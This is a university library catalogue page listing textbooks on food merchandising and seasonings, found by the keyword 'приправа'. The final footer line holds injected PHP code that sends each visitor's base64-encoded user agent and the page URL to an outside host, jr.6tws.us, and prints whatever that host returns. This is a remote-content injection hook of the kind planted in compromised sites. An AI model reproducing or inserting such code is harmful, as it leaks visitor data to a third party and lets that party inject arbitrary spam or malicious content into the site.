Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

83 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПРИПРАВА")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 25
1. 
Идентификационная и товарная экспертиза продуктов растительного происхождения [Текст] / Л. Г. Елисеева [и др.] ; ред. Л. Г. Елисеева, 2014. - 523 с.
Ключевые слова 
ИДЕНТИФИКАЦИЯ ПРОДУКЦИИ -- ЭКСПЕРТИЗА ТОВАРНАЯ -- ФАЛЬСИФИКАЦИЯ ПРОДУКЦИИ -- ЭКСПЕРТИЗА ИДЕНТИФИКАЦИОННАЯ -- ТОВАРЫ ЗЕРНОМУЧНЫЕ -- ЗЕРНО -- МУКА -- КРУПА -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ БАРАНОЧНЫЕ -- ИЗДЕЛИЯ СУХАРНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ПЛОДЫ СВЕЖИЕ -- ОВОЩИ -- ПРИЕМКА СВЕЖИХ ПЛОДОВ -- ПРИЕМКА ОВОЩЕЙ -- ПРИЕМКА ПЛОДООВОЩНОЙ ПРОДУКЦИИ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- ВОДА МИНЕРАЛЬНАЯ -- ЧАЙ -- КОФЕ -- ПРЯНОСТИ -- ПРИПРАВА -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ САХАРНЫЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ -- ПРОДУКТЫ ГЕНЕТИЧЕСКИ МОДИФИЦИРОВАННЫЕ -- ГМО -- МАРКИРОВКА ПИЩЕВОЙ ПРОДУКЦИИ -- ЗСГМО -- ИНЖЕНЕРИЯ ГЕННАЯ -- ГОСТ Р 51293-99 -- ПРОТОКОЛ ИДЕНТИФИКАЦИИ ПРОДУКЦИИ -- АКТ ОТБОРА ПРОБ -- ВСКРЫТИЕ ТАРЫ -- ЦЕЛОСТНОСТЬ УПАКОВКИ -- ОБРАЗЦЫ ДОКУМЕНТОВ
Держатели документа (Информация об экземплярах) 
2. 
Товароведение и экспертиза потребительских товаров [Текст] / В. В. Шевченко [и др.] ; рук. работы В. В. Шевченко, 2014. - 751 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ ПОТРЕБИТЕЛЬСКИХ ТОВАРОВ -- ЭКСПЕРТИЗА ПОТРЕБИТЕЛЬСКИХ ТОВАРОВ -- ТОВАРОВЕДЕНИЕ - ТЕОРИЯ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- КЛАССИФИКАЦИЯ ТОВАРА -- КОДИРОВАНИЕ ТОВАРА -- СОСТАВ ХИМИЧЕСКИЙ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ВОДА -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ -- УГЛЕВОДЫ -- ЛИПИДЫ -- ЖИРЫ -- ЛИПОИДЫ -- ВЕЩЕСТВА АЗОТСОДЕРЖАЩИЕ -- ВИТАМИН -- ФЕРМЕНТ -- КИСЛОТА ОРГАНИЧЕСКАЯ -- КОНСЕРВИРОВАНИЕ ПИЩЕВЫХ ПРОДУКТОВ -- ТАРА -- МАТЕРИАЛ УПАКОВОЧНЫЙ -- МАРКИРОВКА ПИЩЕВОЙ ПРОДУКЦИИ -- ТОВАРЫ ЗЕРНОМУЧНЫЕ -- ЗЕРНО -- КРУПА -- МУКА -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ БАРАНОЧНЫЕ -- ИЗДЕЛИЯ СУХАРНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПЛОДЫ СВЕЖИЕ -- ЯГОДЫ -- ОРЕХИ -- ОВОЩИ -- ТОВАРЫ ВКУСОВЫЕ -- ПРЯНОСТИ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК АЛКОГОЛЬНЫЙ -- ВИНО ВИНОГРАДНОЕ -- БРЕНДИ -- КОНЬЯК -- ИЗДЕЛИЯ ТАБАЧНЫЕ -- КРАХМАЛ -- КРАХМАЛОПРОДУКТЫ -- САХАР -- ЗАМЕНИТЕЛЬ САХАРА -- МЕД -- ТОВАРЫ КОНДИТЕРСКИЕ -- СЛАДОСТИ ВОСТОЧНЫЕ -- ТОВАРОВЕДЕНИЕ МОЛОЧНЫХ ТОВАРОВ -- МОЛОКО -- КОНСЕРВЫ МОЛОЧНЫЕ -- СЫР -- МАСЛО -- МОРОЖЕНОЕ -- ЖИРЫ -- ЖИР ПИЩЕВОЙ -- ТОВАРОВЕДЕНИЕ ПИЩЕВЫХ ЖИРОВ -- МАСЛО РАСТИТЕЛЬНОЕ -- ЖИР ТОПЛЕНЫЙ -- МАРГАРИН -- МАЙОНЕЗ -- ТОВАРОВЕДЕНИЕ МЯСНЫХ ПРОДУКТОВ -- МЯСО -- МЯСО ПТИЦЫ -- КОНСЕРВЫ МЯСНЫЕ -- ПОЛУФАБРИКАТЫ МЯСНЫЕ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ТОВАРОВЕДЕНИЕ РЫБНЫХ ПРОДУКТОВ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ИКРА -- ПОЛУФАБРИКАТЫ РЫБНЫЕ -- МОРЕПРОДУКТЫ
Держатели документа (Информация об экземплярах) 
3. 
Вытовтов А. А. Товароведение и экспертиза вкусовых товаров [Текст] / А. А. Вытовтов, 2015. - 575 с.
Держатели документа (Информация об экземплярах) 
4. 
Барановский В. А. Продавец [Текст] : учеб. пособие для учащихся колледжей и средних проф.-тех. училищ / В. А. Барановский, 2000. - 412 с.
Ключевые слова 
ПРОДАВЕЦ -- СЕТЬ ТОРГОВАЯ РОЗНИЧНАЯ -- ТОРГОВЛЯ РОЗНИЧНАЯ -- МАГАЗИН - ПЛАНИРОВКА -- ТОВАРОСНАБЖЕНИЕ -- ОБОРУДОВАНИЕ ТОРГОВОЕ -- ИНВЕНТАРЬ ТОРГОВЫЙ -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- ОБОРУДОВАНИЕ ПОДЪЕМНО - ТРАНСПОРТНОЕ -- АППАРАТ контрольно-кассовый -- ОБОРУДОВАНИЕ ХОЛОДИЛЬНОЕ -- ОБОРУДОВАНИЕ ВЕСОИЗМЕРИТЕЛЬН -- ПРАВИЛА работы магазина -- ОРГАНИЗАЦИЯ РАБОЧЕГО МЕСТА продавца -- СПРОС ПОКУПАТЕЛЬСКИЙ -- ТАРА -- ПРИЕМКА ТОВАРОВ -- РЕКЛАМА ТОРГОВАЯ -- ОХРАНА ТРУДА - МАГАЗИН -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ -- КАЧЕСТВО ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ОВОЩИ -- МУКА -- КРУПА -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ТОВАРЫ МОЛОЧНЫЕ -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- РЫБА -- ТОВАРЫ ВКУСОВЫЕ -- ЧАЙ -- КОФЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- ТАБАК - ТОРГОВЛЯ -- ПРЯНОСТИ -- ПРИПРАВА -- ЖИР ПИЩЕВОЙ -- МАСЛО РАСТИТЕЛЬНОЕ -- МАРГАРИН -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ТОВАРЫ текстильные -- ТОВАРЫ швейные -- ТОВАРЫ ТРИКОТАЖНЫЕ -- ТОВАРЫ ОБУВНЫЕ -- ТОВАРЫ ГАЛАНТЕРЕЙНЫЕ -- ТОВАРЫ ПАРФЮМЕРНО-КОСМЕТИЧЕС -- КУЛЬТТОВАРЫ -- ТОВАРЫ СТЕКЛЯННЫЕ -- ТОВАРЫ КЕРАМИЧЕСКИЕ -- ТОВАРЫ МЕТАЛЛОХОЗЯЙСТВЕННЫЕ
Держатели документа (Информация об экземплярах) 
5. 
Товароведение пищевых продуктов [Текст] / В. Б. Тылкин [и др.] ; ред. В. Б. Тылкин, 1980. - 429 с.
Ключевые слова 
СОСТАВ ХИМИЧЕСКИЙ - ПРОДУКТЫ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- ПРОДУКТЫ ПИЩЕВЫЕ -- ЗЕРНО -- КРУПА -- МУКА -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ХЛЕБ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- Овощи -- Плоды -- Грибы -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ПРОДУКТЫ ВКУСОВЫЕ -- ПРЯНОСТИ -- ПРИПРАВА -- КИСЛОТА ПИЩЕВАЯ -- ЧАЙ -- КОФЕ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- МЯСО -- СУБПРОДУКТЫ -- МЯСО ПТИЦЫ -- МЯСО КРОЛИКОВ -- МОЛОКО -- СЛИВКИ -- ПРОДУКТЫ КИСЛОМОЛОЧНЫЕ -- МОЛОКО СГУЩЕННОЕ -- МОЛОКО СУХОЕ -- МОРОЖЕНОЕ -- СЫР -- МАСЛО КОРОВЬЕ -- ЯЙЦА -- Рыба -- ИКРА -- ЖИР ПИЩЕВОЙ
Держатели документа (Информация об экземплярах) 
6. 
Товароведение пищевых продуктов [Текст] / И. Е. Кононенко [и др.], 1983. - 423 с.
Ключевые слова 
СОСТАВ ХИМИЧЕСКИЙ - ПРОДУКТЫ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- ПРОДУКТЫ ПИЩЕВЫЕ -- ЗЕРНО -- КРУПА -- МУКА -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ХЛЕБ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- Овощи -- Плоды -- Грибы -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ПРОДУКТЫ ВКУСОВЫЕ -- ПРЯНОСТИ -- ПРИПРАВА -- КИСЛОТА ПИЩЕВАЯ -- ЧАЙ -- КОФЕ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- МЯСО -- СУБПРОДУКТЫ -- МЯСО ПТИЦЫ -- МЯСО КРОЛИКОВ -- МОЛОКО -- СЛИВКИ -- ПРОДУКТЫ КИСЛОМОЛОЧНЫЕ -- МОЛОКО СГУЩЕННОЕ -- МОЛОКО СУХОЕ -- МОРОЖЕНОЕ -- СЫР -- МАСЛО КОРОВЬЕ -- ЯЙЦА -- Рыба -- ИКРА -- ЖИР ПИЩЕВОЙ -- МАРГАРИН
Держатели документа (Информация об экземплярах) 
7. 
Современная торговля. - Журнал, 2005г. № 8
Оглавление 
  • Они умеют управлять. - с.3-4
  • Магазин в борьбе за независимость. - с.5-7
  • Богатова, Т. Чтоб склад работал "как часы" / Т. Богатова. - с.8-11
  • Колодезников, А. "Замороженная" война / А. Колодезников, А. Бакеев. - с.12-14
  • Вкусная приправа. Обзор рынка майонеза. - с.15-17
  • Архитектура торгового центра. - с.18-20
  • Бородянский, М. Незримые нюансы / М. Бородянский. - с.21-22
  • Траектория "Лэнд". - с.23-25
  • Богатова, Т. Мимо кассы не пройдешь. Российский рынок front-end решений / Т. Богатова. - с.26-30
  • Комфорт для покупателя. - с.31-32
  • Комплексная автоматизация. - с.33-35
  • Михайлов, Б. Главный потенциал / Б. Михайлов. - с.36-38
  • Удалова, К. Как организовать мерчендайзинг? / К. Удалова. - с.39-42
  • Кошовец, Е. Бонус лояльности / Е. Кошовец. - с.43-46
  • "Партизанский" маркетинг. - с.47-48
  • Стратегии развития маркетинга. - с.49-56
  • Любимые
  • Всем надо шоколада!. - с.60-62
  • Мыльные пузыри. - с.63-64
  • "Локомотивы" торговли. - с.65-67
  • Кадровая политика: проблемы и решения. - с.68-72
  • Технология управления маркетингом. - с.73-76
  • Финансовое планирование. - с.77-81
  • Аудит в торговле. - с.82-84
Держатели документа (Информация об экземплярах) 
8. 
Идентификационная и товарная экспертиза продуктов растительного происхождения [Текст] / Л. Г. Елисеева [и др.] ; ред. Л. Г. Елисеева, 2013. - 523 с.
Держатели документа (Информация об экземплярах) 

Рассматриваются теоретические основы идентификационной и товарной экспертизы продуктов растительного происхождения, в том числе зерномучных товаров, свежих плодов и овощей, вкусовых товаров, крахмала, сахара, меда и кондитерских товаров и др.

Особое внимание уделяется экспертизе генетически модифицированных пищевых продуктов растительного происхождения.

Для студентов, обучающихся по специальности «Товароведение», также специалистов торговли, работников таможенных и экспертных предприятий

9. 
Вытовтов, Анатолий Андреевич. Товароведение и экспертиза вкусовых товаров [Текст] / А. А. Вытовтов, 2013. - 574, [1] с.
Держатели документа (Информация об экземплярах) 

Учебник написан с учетом требований Федерального закона "О техническом регулировании" общих и специальных технических регламентов, других нормативных документов. Рассмотрены потребительская ценность, классификация, основы технологии, фальсификация, требования к упаковке, маркировке, условиям хранения, требованиям к показателям качества и безопасности, оценка соответствия, экспертиза различных групп и видов вкусовых товаров.

Для студентов высших и средних профессиональных образовательных учреждений, обучающихся по специальности "Товароведение и экспертиза товаров", слушателей системы повышения квалификации, а также практических работников.

10. 
Чепурной И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учеб. / И. П. Чепурной , 2007. - 459 с.
Держатели документа (Информация об экземплярах) 
11. 
Поскребышева Г. И. Праздничный стол [Текст] : издания для досуга / Г. И. Поскребышева, 2006. - 191 с.
Держатели документа (Информация об экземплярах) 
12. 
Митвайс, Ирина Ивановна. Товароведение вкусовых товаров [Текст] : Уч.пособие / И. И. Митвайс, 2002. - 480 с.
13. 
Коробкина, Зоя Васильевна. Товароведение и экспертиза вкусовых товаров [Текст] : Учебник гриф-МО / З. В. Коробкина, С. А. Страхова, 2003. - 352 с.
14. 
Товароведение и экспертиза потребительских товаров [Текст] : учеб. для торговых учеб. заведений / И. А. Ермилова [и др.], 2007. - 542, [1] с.

В учебнике изложены предмет и задачи, теоретические основы товароведения, классификация, химический состав, пищевая ценность отдельных групп товаров. Даны современные особенности технологии отечественных и импортных продуктов. Особое внимание уделяется сертификации и проведению экспертизы товаров растительного и животного происхождения.

15. 
Тимофеева, Валентина Афанасьевна. Товароведение продовольственных товаров [Текст] : Учеб. пособие для образоват. учреждений сред. и проф. образования по специальности 0612 "Товароведение" / В. А. Тимофеева, 2002. - 447 с.
Ключевые слова 
ПРОДОВОЛЬСТВЕННЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ПРОДУКТЫ -- ЯИЧНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ВКУСОВЫЕ ТОВАРЫ -- ПЛОДООВОЩЫЕ ТОВАРЫ -- ЗЕРНО -- ПИЩЕВЫЕ КОНЦЕНТРАТЫ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК чайный -- ПРЯНОСТИ -- ТАБАК -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- Крахмал -- Сахар -- Мед -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- МОЛОКО -- Мороженое -- СЫР -- ЖИР пищевой -- Масло растительное -- Маргарин -- Жир кулинарный -- МЯСО -- ЯЙЦЕПРОДУКТЫ -- Концентрат пищевой -- РЫБА

В книге рассматриваются основные вопросы товароведения продовольственных товаров в современных условиях; приведены необходимые <продавцу> и <товароведу> сведения по всем группам <товаров>, а также по вопросам <стандартизации> и <сертификации>, информационному обеспечению, которые позволят работникам торговли принимать квалифицированные решения в <коммерческой деятельности>.

16. 
Чепурной, И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учебник / И. П. Чепурной, 2002. - 460 с.
Держатели документа (Информация об экземплярах) 
17. 
Михайлова М. С. Товароведение вкусовых товаров для официантов, барменов [Текст] : Учеб. пособие для студ. образоват. учреждений сред. проф. образования / М. С. Михайлова, 2002. - 255 с.
Держатели документа (Информация об экземплярах) 
18. 
Герасимова В. А. Товароведение и экспертиза вкусовых товаров [Текст] : учеб. для студ. высш. учеб. заведений / В. А. Герасимова, Е. С. Белокурова, А. А. Вытовтов, 2005. - 396 с.
Держатели документа (Информация об экземплярах) 
19. 
Поскребышева Г. И. Праздничный стол [Текст] : издания для досуга / Г. И. Поскребышева, 2004. - 191 с.
Держатели документа (Информация об экземплярах) 
20. 
Барановский В. А. Продавец [Текст] : Учеб. пособие для уч-ся учеб. заведений нач. проф. образования / В. А. Барановский, Л. И. Рубцова, В. А. Тимофеева, 2003. - 447 с.
Ключевые слова 
ПРОДАВЕЦ -- ТОВАРОДВИЖЕНИЕ -- СЕТЬ ТОРГОВАЯ РОЗНИЧНАЯ -- ТОРГОВЛЯ РОЗНИЧНАЯ -- КООПЕРАЦИЯ ПОТРЕБИТЕЛЬСКАЯ -- МАГАЗИН - Планировка -- ЗАЛ ТОРГОВЫЙ -- ОБОРУДОВАНИЕ ТОРГОВОЕ -- ИНВЕНТАРЬ ТОРГОВЫЙ -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- ОБОРУДОВАНИЕ ПОДЪЕМНО - ТРАН -- АППАРАТ контрольно-кассовый -- ОБОРУДОВАНИЕ ХОЛОДИЛЬНОЕ -- ОБОРУДОВАНИЕ ВЕСОИЗМЕРИТЕЛЬН -- АССОРТИМЕНТ ТОВАРНЫЙ -- СПРОС ПОКУПАТЕЛЬСКИЙ -- ТАРА -- ТОВАРООБОРОТ -- ПРИЕМКА ТОВАРОВ -- РАБОЧЕЕ МЕСТО продавца -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ТОВАРЫ МОЛОЧНЫЕ -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- РЫБА -- ТОВАРЫ ВКУСОВЫЕ -- ЧАЙ -- КОФЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- ТАБАК - ТОРГОВЛЯ -- ПРЯНОСТИ -- ПРИПРАВА -- НАПИТОК АЛКОГОЛЬНЫЙ -- ЖИР ПИЩЕВОЙ -- МАСЛО РАСТИТЕЛЬНОЕ -- МАРГАРИН -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ТОВАРЫ текстильные -- ТОВАРЫ швейные -- ТОВАРЫ ТРИКОТАЖНЫЕ -- ТОВАРЫ ОБУВНЫЕ -- ТОВАРЫ ГАЛАНТЕРЕЙНЫЕ -- ТОВАРЫ ПАРФЮМЕРНО-КОСМЕТИЧЕС -- КУЛЬТТОВАРЫ -- ТОВАРЫ СТЕКЛЯННЫЕ -- ТОВАРЫ КЕРАМИЧЕСКИЕ -- ТОВАРЫ МЕТАЛЛОХОЗЯЙСТВЕННЫЕ
Держатели документа (Информация об экземплярах) 
21. 
Эткер Чеснок [Текст] / Эткер, 1994. - 96 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3053 - 19.10.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.99 с.14 запросов, 0.49c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;